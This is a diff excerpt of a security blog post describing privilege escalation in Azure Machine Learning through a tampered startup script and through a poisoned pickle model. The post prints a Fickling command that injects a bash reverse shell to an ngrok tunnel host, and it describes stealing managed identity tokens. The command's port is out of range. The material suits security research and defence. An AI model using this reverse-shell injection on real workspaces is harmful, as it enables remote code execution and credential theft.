xybytes/xybytes.github.io/_posts/2025-03-07-Privilege-Escalation-in-Azure-Machine-Learning.markdown

 ![ely_startup_script]({{site.baseurl}}/assets/images/AZML/ely_startup_script.png){:style="display:block; margin-left:auto; margin-right:auto"}

 The attacker can locate a file named startup.sh, delete it, and replace it with a malicious file of the same name containing a reverse shell.
 When a compute instance is started or restarted, the attacker can gain a reverse shell on the machine.
 In this scenario, ngrok is used to expose a listener and establish the reverse shell connection.
-The attacker can then obtain a Managed Identity access token and leverage it to pivot to other systems.
+The attacker can then obtain a managed identity access token and leverage it to pivot to other systems.

 ![shell_startup]({{site.baseurl}}/assets/images/AZML/shell_startup.png){:style="display:block; margin-left:auto; margin-right:auto"}

-#### Pickle File Injection: From Storage Account to Azure Container
+**Pickle File Injection: From Storage Account to Azure Container**

 A similar attack scenario can be executed using a .pkl file.
 In this case, if user files are stored in the File Share, jobs and experiments are stored in Blob Storage.
-As before, we assume an attacker has compromised the user Ely, who does not have access to Azure Machine Learning but holds the Storage Account Contributor role.
+As before, we assume an attacker has compromised an user who does not have access to Azure Machine Learning but holds the Storage Account Contributor role.
 The attacker can identify the model stored in the blob, download it, inject malicious Python code into the model, and re-upload the malicious model back into the storage account.
 This poses a significant risk because .pkl files are typically neither inspected nor easily readable, they contain pre-trained models.
 These compromised models can be deployed across various systems, including Flask applications, Azure Virtual Machines, Azure Machine Learning endpoints, Azure App Service, Azure Containers, or even external systems outside the cloud.
 Moreover, such models are frequently distributed internally within organizations, shared with clients, or exposed in public repositories like GitHub, enabling attackers to spread malicious code across the organization.
 In our demonstration, we injected malicious code into a `model.pkl` file using a tool called Fickling.
 As an example, the compromised model was deployed in an Azure Container via Azure Machine Learning.

 As the first step, we identify the `model.pkl` file within the blob storage that we intend to inject with malicious code.

 ![storage_pkl]({{site.baseurl}}/assets/images/AZML/storage_pkl.png){:style="display:block; margin-left:auto; margin-right:auto"}

-After identifying the file, we download it and inject a reverse shell code with [Fickling]("https://github.com/trailofbits/fickling").
+After identifying the file, we download it and inject a reverse shell with [Fickling]("https://github.com/trailofbits/fickling").
 We can then overwrite the original `model.pkl` file in the blob with the compromised version containing the injected code.
 Once re-uploaded, the malicious code will execute whenever the model is deployed.

 ```bash
 fickling --inject '__import__("subprocess").run(["bash", "-c", "bash -i >&/dev/tcp/0.tcp.eu.ngrock.io/122274 0>&1"])' model_original.pkl > model.pkl